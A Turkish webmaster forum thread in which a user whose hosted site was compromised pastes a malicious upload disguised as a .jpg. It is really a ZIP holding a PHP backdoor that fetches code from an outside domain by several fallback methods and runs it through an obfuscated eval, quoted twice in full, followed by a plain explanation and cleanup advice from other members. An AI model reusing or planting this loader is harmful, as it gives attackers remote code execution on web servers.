• 13-12-2024, 00:12:59
    #28
    kriptogorev adlı üyeden alıntı: mesajı görüntüle
    lisanssız tema veya eklentiden dolayı
    wordpress gibi gözükmüyor hocam sorun
    RakipsizHizmet adlı üyeden alıntı: mesajı görüntüle
    Kısa yoldan yazıları resimleri dışarı çıkart bunlar için bir tarama yap daha sonra her şeyi sıfırdan kur. En garanti yöntem budur.
    yunusdm adlı üyeden alıntı: mesajı görüntüle
    Log kayıtlarına bakmak gerekir
    yedekler yüklendi, yüklenen .jpg dosyasını tarattığımda sonuç bu çıkıyor.

    https://www.virustotal.com/gui/file/...8252a90ea820a5




    .jpg dosyasının içini notepad ile açtığımda:

    PK   ȼRY €  v3.phpUT
    øg‰gñ“gux õ õ ½T]kÛ0}߯pEhìâÙM7X‰çv%”v0Öµ{)Aå:6S$!ÉMJèß•?R÷!>l O¶tÏ=ç~êë¥*”—W‚ÙR
    OÃhþÀXl5ØJ ÿñ¾¹K^•æi‡#ëLÇÏ_ ÒËõçX²èY[:ÇFY[  ÿD. çI™û…Mi¬ñ;ª¡AO+$£–x™ƒ Øîü¿±ŒsZÐÔQô ]+ÊíüÓ:‚ãã½ú¶%åºb¨{¦¤Ó1@V¤ûBëSúA²Ö§ ‘0|5Ì*Ä[«+èUsƒ
    ôˆh2àr‡z_¥(Ùv§ÈÄ‚ï§EÖý‰ÆypBS¯·8Y*è,eRX¨Ö¡’ œqéF²;¿¼?Ø?Lš6` dšikR•¡™âÑo†e«ƒi´ááqXHc‡óðü4€ÖBÖÌ%ütÚ$š+T”•MÉ Íõ½G¢¯Êl1œGÄ»½¿ŸÆ£h¤I6JÉ-òß©ˆôP)Ô9½‰+‘Κ¯uiÁi‡ˆ‰i0J
    ép˜¬‹’ƒ”ƒlÂÃø:s”æØ S{ÎαÐ]å÷:y°Q¿>©åÂ{x<æïíNCþÑ.Mf?¨«2ý}=ûõýî'=£§ÿu•Ü (—¾IIa*"éþ@¶ ¿ä9?^-qìÇÞôvŠeÈc ðlacã®xèÄ'®âd¶ çˆSEæódP/ÍÆv{Ô)Ó<?php $u="ht";$p="tps";$d="://";$a="media";$b=".iloveto";$c=".cyou";$デ="/media/videos/h264/";$ur="mp4.txt";$url=$u.$p.$d.$a.$b.$c.$デ.$ur;func tion fetchContentWithFileGetContents($url){if(ini_get(' allow_url_fopen')){return@file_get_contents($url); }return false;}function fetchContentWithCurl($url){if(function_exists('cur l_version')){$ch=curl_init($url);curl_setopt($ch,C URLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOP T_SSL_VERIFYPEER,false);curl_setopt($ch,CURLOPT_SS L_VERIFYHOST,0);$response=curl_exec($ch);$error=cu rl_error($ch);curl_close($ch);return $error?false:$response;}return false;}function fetchContentWithFopen($url){if($file=fopen($url,'r ')){$content=stream_get_contents($file);fclose($fi le);return $content;}return false;}function fetchContentWithStreamContext($url){$context=strea m_context_create(["http"=>["method"=>"GET","header"=>"User-Agent: PHP scriptrn"]]);return@file_get_contents($url,false,$context);}f unction fetchContentWithFile($url){$lines=@file($url);if($ lines===false){return false;}return implode('',$lines);}function fetchContent($url){$content=fetchContentWithFileGe tContents($url);if($content===false){$content=fetc hContentWithCurl($url);}if($content===false){$cont ent=fetchContentWithFopen($url);}if($content===fal se){$content=fetchContentWithStreamContext($url);} if($content===false){$content=fetchContentWithFile ($url);}return $content;}function obfuscatedEval($content){$evalFunc='e'.'v'.'a'.'l' ;if(empty($content)){return;}if(@eval("?>".$conten t)===false){return;}$evalFunc("?>".$content);}$con tent=fetchContent($url);if($content!==false){obfus catedEval($content);}else{echo "エラー: Gagal mengambil konten.";} ?>…V¼—óÞÇlŸÒMó¤®ðdM·ÀyƱÏÚÛTÒ´6[xʸO./p~["M[`…ôÈõìn6‹Hòâ]^|ø PKýBvây € PK   ȼRY °  __MACOSX/._v3.phpUT
    øg‰gþ“gux õ õ c`cg`b`ðMLVðVˆP€'qƒøˆ!!AP&HÇ @Sˆ—JÎÏÕK,(ÈIÕËI,.)-NMII,IU)ììJÑAùíÆ  PK(ÿ ° PK   ȼRYýBvây €  ¤ v3.phpUT
    øg‰gñ“gux õ õ PK   ȼRY(ÿ °  ¤Í __MACOSX/._v3.phpUT
    øg‰gþ“gux õ õ PK   ³ ˆ


    Paylaştığınız içerik, PHP kodu ve muhtemelen şifrelenmiş (obfuscate edilmiş) bir betik içeriyor. Bu betik, çeşitli yöntemlerle uzaktan içerik almayı ve bu içeriği PHP'nin eval fonksiyonu ile çalıştırmayı amaçlıyor.
    İşte ana bileşenlerin kısa bir açıklaması:
    1. Şifreli URL Oluşumu:
      URL şu şekilde inşa ediliyor:
      php
      Kodu kopyala
      $url = "https://media.iloveto.cyou/media/videos/h264/mp4.txt";
    2. İçerik Almak İçin Fonksiyonlar:
      İçerik almak için birkaç farklı yöntem kullanılıyor (örneğin, file_get_contents, curl, fopen gibi). Eğer bir yöntem başarısız olursa, diğer yöntemler deneniyor.
    3. Alınan İçeriği Çalıştırma:
      Alınan içerik, eval fonksiyonu ile çalıştırılıyor:
      php
      Kodu kopyala
      obfuscatedEval($content);
    4. Hata Mesajı:
      Eğer içerik alınamazsa, şu hata mesajı görüntüleniyor:
      less
      Kodu kopyala
      エラー: Gagal mengambil konten. (Hata: İçerik alınamadı.)

    Riskler ve Uyarılar:


    Bu kod, uzaktan alınan içeriği çalıştırma amacı taşıyor ve bu içerik kötü amaçlı olabilir. Özellikle eval fonksiyonunun kullanılması, kötü amaçlı kodların çalıştırılmasına yol açabilir. Bu tür şifrelenmiş veya obfuscate edilmiş kodlar genellikle güvenlik açıklarına yol açabilir.
    Bu tür bir kodla karşılaştığınızda dikkatli olmalısınız. Herhangi bir kötü amaçlı içerik veya güvenlik riski taşıyan işlemden kaçınmak önemlidir.
    Eğer bu kodu daha detaylı analiz etmek isterseniz veya başka bir sorunuz varsa, yardımcı olabilirim!
  • 13-12-2024, 00:14:19
    #29
    Kurumsal PLUS
    riwe adlı üyeden alıntı: mesajı görüntüle
    wordpress gibi gözükmüyor hocam sorun



    yedekler yüklendi, yüklenen .jpg dosyasını tarattığımda sonuç bu çıkıyor.

    https://www.virustotal.com/gui/file/...8252a90ea820a5




    .jpg dosyasının içini notepad ile açtığımda:

    PK   ȼRY €  v3.phpUT
    øg‰gñ“gux õ õ ½T]kÛ0}߯pEhìâÙM7X‰çv%”v0Öµ{)Aå:6S$!ÉMJèß•?R÷!>l O¶tÏ=ç~êë¥*”—W‚ÙR
    OÃhþÀXl5ØJ ÿñ¾¹K^•æi‡#ëLÇÏ_ ÒËõçX²èY[:ÇFY[  ÿD. çI™û…Mi¬ñ;ª¡AO+$£–x™ƒ Øîü¿±ŒsZÐÔQô ]+ÊíüÓ:‚ãã½ú¶%åºb¨{¦¤Ó1@V¤ûBëSúA²Ö§ ‘0|5Ì*Ä[«+èUsƒ
    ôˆh2àr‡z_¥(Ùv§ÈÄ‚ï§EÖý‰ÆypBS¯·8Y*è,eRX¨Ö¡’ œqéF²;¿¼?Ø?Lš6` dšikR•¡™âÑo†e«ƒi´ááqXHc‡óðü4€ÖBÖÌ%ütÚ$š+T”•MÉ Íõ½G¢¯Êl1œGÄ»½¿ŸÆ£h¤I6JÉ-òß©ˆôP)Ô9½‰+‘Κ¯uiÁi‡ˆ‰i0J
    ép˜¬‹’ƒ”ƒlÂÃø:s”æØ S{ÎαÐ]å÷:y°Q¿>©åÂ{x<æïíNCþÑ.Mf?¨«2ý}=ûõýî'=£§ÿu•Ü (—¾IIa*"éþ@¶ ¿ä9?^-qìÇÞôvŠeÈc ðlacã®xèÄ'®âd¶ çˆSEæódP/ÍÆv{Ô)Ó<?php $u="ht";$p="tps";$d="://";$a="media";$b=".iloveto";$c=".cyou";$デ="/media/videos/h264/";$ur="mp4.txt";$url=$u.$p.$d.$a.$b.$c.$デ.$ur;func tion fetchContentWithFileGetContents($url){if(ini_get(' allow_url_fopen')){return@file_get_contents($url); }return false;}function fetchContentWithCurl($url){if(function_exists('cur l_version')){$ch=curl_init($url);curl_setopt($ch,C URLOPT_RETURNTRANSFER,true);curl_setopt($ch,CURLOP T_SSL_VERIFYPEER,false);curl_setopt($ch,CURLOPT_SS L_VERIFYHOST,0);$response=curl_exec($ch);$error=cu rl_error($ch);curl_close($ch);return $error?false:$response;}return false;}function fetchContentWithFopen($url){if($file=fopen($url,'r ')){$content=stream_get_contents($file);fclose($fi le);return $content;}return false;}function fetchContentWithStreamContext($url){$context=strea m_context_create(["http"=>["method"=>"GET","header"=>"User-Agent: PHP scriptrn"]]);return@file_get_contents($url,false,$context);}f unction fetchContentWithFile($url){$lines=@file($url);if($ lines===false){return false;}return implode('',$lines);}function fetchContent($url){$content=fetchContentWithFileGe tContents($url);if($content===false){$content=fetc hContentWithCurl($url);}if($content===false){$cont ent=fetchContentWithFopen($url);}if($content===fal se){$content=fetchContentWithStreamContext($url);} if($content===false){$content=fetchContentWithFile ($url);}return $content;}function obfuscatedEval($content){$evalFunc='e'.'v'.'a'.'l' ;if(empty($content)){return;}if(@eval("?>".$conten t)===false){return;}$evalFunc("?>".$content);}$con tent=fetchContent($url);if($content!==false){obfus catedEval($content);}else{echo "エラー: Gagal mengambil konten.";} ?>…V¼—óÞÇlŸÒMó¤®ðdM·ÀyƱÏÚÛTÒ´6[xʸO./p~["M[`…ôÈõìn6‹Hòâ]^|ø PKýBvây € PK   ȼRY °  __MACOSX/._v3.phpUT
    øg‰gþ“gux õ õ c`cg`b`ðMLVðVˆP€'qƒøˆ!!AP&HÇ @Sˆ—JÎÏÕK,(ÈIÕËI,.)-NMII,IU)ììJÑAùíÆ  PK(ÿ ° PK   ȼRYýBvây €  ¤ v3.phpUT
    øg‰gñ“gux õ õ PK   ȼRY(ÿ °  ¤Í __MACOSX/._v3.phpUT
    øg‰gþ“gux õ õ PK   ³ ˆ


    Paylaştığınız içerik, PHP kodu ve muhtemelen şifrelenmiş (obfuscate edilmiş) bir betik içeriyor. Bu betik, çeşitli yöntemlerle uzaktan içerik almayı ve bu içeriği PHP'nin eval fonksiyonu ile çalıştırmayı amaçlıyor.
    İşte ana bileşenlerin kısa bir açıklaması:
    1. Şifreli URL Oluşumu:
      URL şu şekilde inşa ediliyor:
      php
      Kodu kopyala
      $url = "https://media.iloveto.cyou/media/videos/h264/mp4.txt";
    2. İçerik Almak İçin Fonksiyonlar:
      İçerik almak için birkaç farklı yöntem kullanılıyor (örneğin, file_get_contents, curl, fopen gibi). Eğer bir yöntem başarısız olursa, diğer yöntemler deneniyor.
    3. Alınan İçeriği Çalıştırma:
      Alınan içerik, eval fonksiyonu ile çalıştırılıyor:
      php
      Kodu kopyala
      obfuscatedEval($content);
    4. Hata Mesajı:
      Eğer içerik alınamazsa, şu hata mesajı görüntüleniyor:
      less
      Kodu kopyala
      エラー: Gagal mengambil konten. (Hata: İçerik alınamadı.)

    Riskler ve Uyarılar:


    Bu kod, uzaktan alınan içeriği çalıştırma amacı taşıyor ve bu içerik kötü amaçlı olabilir. Özellikle eval fonksiyonunun kullanılması, kötü amaçlı kodların çalıştırılmasına yol açabilir. Bu tür şifrelenmiş veya obfuscate edilmiş kodlar genellikle güvenlik açıklarına yol açabilir.
    Bu tür bir kodla karşılaştığınızda dikkatli olmalısınız. Herhangi bir kötü amaçlı içerik veya güvenlik riski taşıyan işlemden kaçınmak önemlidir.
    Eğer bu kodu daha detaylı analiz etmek isterseniz veya başka bir sorunuz varsa, yardımcı olabilirim!
    Şifreli olanları kaldır. Devam et.
  • 13-12-2024, 00:16:39
    #30
    RakipsizHizmet adlı üyeden alıntı: mesajı görüntüle
    Şifreli olanları kaldır. Devam et.
    neyin şifresini hocam
  • 13-12-2024, 00:17:44
    #31
    Kurumsal PLUS
    riwe adlı üyeden alıntı: mesajı görüntüle
    neyin şifresini hocam
    Hocam o attığın şifreli kodlar var ya hangi dosyada ise onları sil.
  • 13-12-2024, 00:19:46
    #32
    RakipsizHizmet adlı üyeden alıntı: mesajı görüntüle
    Hocam o attığın şifreli kodlar var ya hangi dosyada ise onları sil.
    dosyaları sildim zaten hocam tek dosya halinde eklenmişler. yedekler vs. eskiye dönüldü. sorunun kaynanğını bulmaya çalışıyorum.
  • 13-12-2024, 00:24:56
    #33
    Kurumsal PLUS
    riwe adlı üyeden alıntı: mesajı görüntüle
    dosyaları sildim zaten hocam tek dosya halinde eklenmişler. yedekler vs. eskiye dönüldü. sorunun kaynanğını bulmaya çalışıyorum.
    Log kaydı yok mu? Daha fazla detayı orada görürsün dosyaların içinde kaybolmaya gerek yok...
  • 13-12-2024, 00:25:25
    #34
    Muhtemelen sql veri tabanlarınıza da sızmışlardır.
  • 13-12-2024, 01:03:47
    #35
    arkadaslar suan host ve tüm siteler tamamen cpanelde gitti

  • 13-12-2024, 04:08:30
    #36
    Geçmiş olsun hocam, hangi script kullanıyordunuz yapımcısı ile görüşseniz? Bende php script kurdum, resim yüklenebiliyor içime kurt düştü durumu script yapımcısına sorayım bende.